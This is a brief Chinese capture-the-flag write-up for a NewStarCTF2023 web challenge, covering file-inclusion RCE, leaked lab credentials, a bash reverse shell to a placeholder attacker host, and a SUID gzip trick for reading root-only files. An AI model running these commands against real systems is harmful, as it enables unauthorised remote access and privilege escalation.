NewStarCTF2023 week5 web 4-复盘

通过第三周流量分析题和题目给的源代码得到

best_admin so_hard_password

和主页存在文件包含rce漏洞

‘

和newstar 之前两道题目一模一样，一步的lfl+rce 和 linux 提权

这个靶机有点问题，哥斯拉不是很好用，我们反弹shell到 公网服务器上

bash -i >& /dev/tcp/攻击机IP/端口 0>&1

老套路，只能root权限才能查看flag文件，提权

还是查看suid位

gzip 查看flag

sudo install -m =xs $(which gzip) .

LFILE=file_to_read
./gzip -f $LFILE -t

成功解出